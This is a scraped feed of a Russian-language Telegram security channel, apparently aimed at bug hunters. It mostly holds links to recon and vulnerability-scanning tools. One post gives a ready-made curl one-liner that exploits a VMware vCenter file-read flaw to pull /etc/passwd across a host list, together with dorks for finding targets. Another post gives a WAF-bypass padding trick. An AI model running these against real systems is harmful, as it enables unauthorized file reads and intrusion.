White Hat
11.8K subscribers
950 photos
51 videos
16 files
1.03K links
Пишем про информационную безопасность и белый хакинг.

Сотрудничество: @workhouse_price

Канал на бирже: https://telega.in/c/kind_hack

Канал в реестре РКН: https://clck.ru/3FtTnR
Download Telegram
Бот для отслеживания новых уязвимостей

Используйте этого бота для мониторинга новых CVE, содержащих определенные ключевые слова, и отправки оповещений в Slack и/или Telegram.

Можно быстро отслеживать появление новых XSS, RCE и тд, писать кастомные шаблоны для Nuclei и прогонять их по своему списку хостов.

Ссылка на GitHub

#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
📑 Инструмент поиска XSS в AngularJS

Инструмент SSTI-XSS-Finder позволяет собирать из Shodan поддомены, которые используют технологию AngularJS, и предоставляет нам полезную нагрузку XSS, связанную с AngularJS-версией этого поддомена.

./SSTI-XSS-Finder.sh <Shodan-Dork>

Примеры дорков:

org:target
hostname:target.com
net:127.0.0.1

Ссылка на GitHub

#Web #XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2💩1
🏃‍♂ Инструмент: CRIU

Проект по реализации функций проверки/восстановления для GNU/Linux.

Используя этот инструмент, вы можете заморозить работающее приложение (или его часть) и сохранить его на жестком диске в виде набора файлов. Затем вы можете использовать файлы для восстановления и запуска приложения с того места, где оно было заморожено.

Отличительной особенностью проекта CRIU является то, что он преимущественно реализуется в пользовательском пространстве.

Ссылка на GitHub
Ссылка на оф. сайт

#Linux #restore
Please open Telegram to view this post
VIEW IN TELEGRAM
👍41💩1
📶 Мощный сканер веб-приложений, объединяющий широкий набор инструментов

reconFTW - это инструмент, предназначенный для выполнения автоматизированного сбора информации о целевом домене, путем запуска наилучшего набора инструментов для выполнения сканирования и выявления уязвимостей.

Он объединяет в себе множество популярных инструментов, которые мы уже рассматривали на канале. Подробнее о работе данного инструменты вы можете узнать на GitHub, но будьте уверены, инструмент заслуживает вашего внимания. Ниже представлена схема его работы.

Ссылка на GitHub

#Web
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9💩1🍓1
🔎 Автоматический поиск SSRF уязвимостей

Для поиска SSRF на сайте можно воспользоваться инструментом под названием SSRFire. Просто укажите доменное имя сайта, адрес своего сервера (или Burp Collaborator) и ждите результатов.

Также есть опции для поиска XSS и Open Redirect. Для работы инструмента требуются установленные Python 3.7+ и GO.

Ссылка на GitHub

#Web #XSS #SSRF
Please open Telegram to view this post
VIEW IN TELEGRAM
👍43💩1
🔎 Инструменты для работы с дорками

Небольшая подборка инструментов, которые позволят вам автоматизировать процесс доркинга.

🗄 GitDorker
🗄 Katana
🗄 Fast-Google-Dorks-Scan
🗄 oxdork
🗄 SDorker
🗄 pagodo
🗄 dorks-eye

Online инструменты:

🗄 Dorksearch
🗄 FilePhish
🗄 Bug Bounty Helper
🗄 Pentest-tools google-hacking

#Web #Recon #Dork
Please open Telegram to view this post
VIEW IN TELEGRAM
💩2
🏳‍🌈 Инструмент: gip (гугл доркинг по IPv4)

Google IP Search - это инструмент OSINT, написанный на JavaScript и HTML. Он использует Google dorks для ограничения поиска только IPv4-адресами.

🗄 Ссылка на сайт
🗄 Ссылка на GitHub

#OSINT #Recon
Please open Telegram to view this post
VIEW IN TELEGRAM
👍51💩1
This media is not supported in your browser
VIEW IN TELEGRAM
🔎 Новый инструмент для скана портов и поиска уязвимостей

Новый инструмент командной строки от разработчиков Shodan для быстрого анализа списка IP-адресов и просмотра того, какие из них имеют открытые порты/уязвимости.

Ссылка на Gitlab

#Web #Recon #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3💩1
😈 Как перехватить трафик в коммутируемой среде?

Анализ сетевого трафика всегда был неотъемлемой частью работы любого сетевого инженера, администратора сети для выявления проблем работоспособности и конфигурации активного оборудования. В этой статье узнаете как же всё таки перехватить трафик.

https://telegra.ph/Kak-perehvatit-trafik-v-kommutiruemoj-srede-02-16
Please open Telegram to view this post
VIEW IN TELEGRAM
⚫️ Обход WAF через большое количество символов

Если вы столкнулись с WAF, то для POST, PUT или PATCH запросов попробуйте вставить в параметр бесполезные символы с произвольными данными, размером от 8 КБ до 10 МБ, ПЕРЕД вашей вредоносной полезной нагрузкой.

Некоторые WAF прекращают обработку после X символов полезной нагрузки, разрешая все ПОСЛЕ этого. Рандомные символы можно сгенерировать тут.

#WAF #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
🔎 Инструмент: AnonymousOverflow

AnonymousOverflow позволяет вам просматривать потоки StackOverflow без загроможденного интерфейса и раскрытия вашего IP-адреса, привычек просмотра и других данных об отпечатках браузера которые преступно собирает StackOverflow.

Этот проект очень легкий по дизайну. Пользовательский интерфейс прост, а внешний интерфейс представляет собой SSR HTML, не требующий JavaScript.

🗄 Ссылка на GitHub

#Privacy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
🔐Обход авторизации в приложениях на Codeigniter

Отличная статья и видео-разбор, в котором вы узнаете, почему в Codeigniter, иногда можно обойти авторизацию с помощью пустого или рандомного JSON, а также обычной SQL инъекции в названии параметра.

🗄 Ссылка на YouTube

#Web #SQLi
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥1💩1
🔎 reconFTW — Комбайн для этичного хакера, который автоматизирует весь процесс разведки.

Он различными способами брутит поддомены (пассивный способ, перебор, перестановки, certificate transparency, парсинг исходного кода, аналитика, DNS-записи) и тестирует цели на подверженность различным уязвимостям. В конечном итоге вы получаете максимальный объем информации об исследуемых ресурсах.

🗄 Ссылка на репозиторий

#BugBounty #Pentest #Recon
Please open Telegram to view this post
VIEW IN TELEGRAM
👍31💩1
📖 Свежий список периодически обновляемых DNS-резолверов

Резолверы играют крайне важную роль в DNS. DNS-резолвер кэширует информацию. К примеру, сайт example.com расположен на машине с IP-адресом 35.195.226.230. Поэтому кэши резолверов со всего мира будут содержать следующее соответствие: example.com35.195.226.230.

Такие инструменты, как например, masscan, nuclei и т.д. позволяют использовать пользовательский список резолверов.

Используя широкий и актуальный список, мы расширяем возможности нашей разведки и имеем больший диапазон для тестирования сайта.

💬 Ссылка на GitHub

#Web #DNS
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1💩1
🟦 LFI, SSRF и XSS в VMware vCenter

В VMware vCenter обнаружили ряд уязвимостей, среди которых несанкционированное чтение произвольных файлов, SSRF и XSS. Протестировано на версии 7.0.2.00100, информации про полный список уязвимых версий нет.

Для поиска уязвимых хостов можно использовать однострочник:

cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done

Дорк, который можно использовать для поиска в Shodan:

http.title:"ID_VC_Welcome"

Для поиска в Zoomeye:

app:"VMware vCenter"

#LFI #SSRF #XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1💩1
🔍 ghauri — инструмент для автоматизации обнаружения и эксплуатации SQL-инъекций.

Усовершенствованный кроссплатформенный инструмент, который автоматизирует процесс обнаружения и использования уязвимостей безопасности SQL-инъекций.

🗄 Ссылка на репозиторий

#Tools #BugBounty #Pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4💩2
⌨️ Продвинутые специализации в сфере ИБ | ИНФОБЕЗДНА

В этом видео мы с вами разберем остальные специализации, которые существуют в ИБ.

Вы узнаете кто такие фиолетовая, зеленая, желтая, оранжевая и белая команды, а также узнаете какие специалисты входят в эти направления и что они делают.

🗄 Смотреть на YouTube

#Cybersecurity #Video
Please open Telegram to view this post
VIEW IN TELEGRAM
⚫️ Что такое XXE Injection? PortSwigger

Внедрение внешнего объекта XML
(XXE) — не самая распространенная, но зачастую критическая уязвимость. Она позволяет вмешиваться в обработку XML-данных веб-приложением.

Знаете ли вы, что кроме извлечения файлов, XXE можно использовать для выполнения SSRF-атак, скрытой эксфильтрации данных и извлечения данных с помощью сообщений об ошибках.

🗄 Подробнее

#XXE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 Веб-службы на нестандартных портах

Чтобы находить больше целей для поиска уязвимостей, следует проверять не только стандартные веб порты (80 и 443), но и нестандартные, такие как 8080, 10000, 8443 и другие, на которых могут располагаться веб-службы.

Если провести некоторый анализ Shodan и имеющихся там веб-служб, работающих на нестандартных портах, то можно выделить некоторый список наиболее распространённых портов, которые следует проверять во время фазы разведки:

httpx -l targets.list -p 8080,10000,20000,2222,7080,9009,7443,2087,2096,8443,4100,2082,2083,2086,9999,2052,9001,9002,7000,7001,8082,8084,8085,8010,9000,2078,2080,2079,2053,2095,4000,5280,8888,9443,5800,631,8000,8008,8087,84,85,86,88,10125,9003,7071,8383,7547,3434,10443,8089,3004,81,4567,7081,82,444,1935,3000,9998,4433,4431,4443,83,90,8001,8099,80,300,443,591,593,832,981,1010,1311,2480,3128,3333,4243,4711,4712,4993,5000,5104,5108,6543,7396,7474,8014,8042,8069,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8500,8834,8880,8983,9043,9060,9080,9090,9091,9200,9800,9981,12443,16080,18091,18092,20720,28017 -o livesites.result

#Web #Recon
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥32👍2🥴2🤡1
❤‍🔥 Умер Кевин Митник, самый известный хакер в мире

16 июля 2023 года скончался Кевин Митник, бывший хакер, который когда-то был одним из самых разыскиваемых компьютерных преступников в Соединенных Штатах.

Об этом в среду сообщили компания по обучению кибербезопасности, которую он соосновал. Ему было 59 лет.

#news
Please open Telegram to view this post
VIEW IN TELEGRAM
🫡53😢10😭6😨1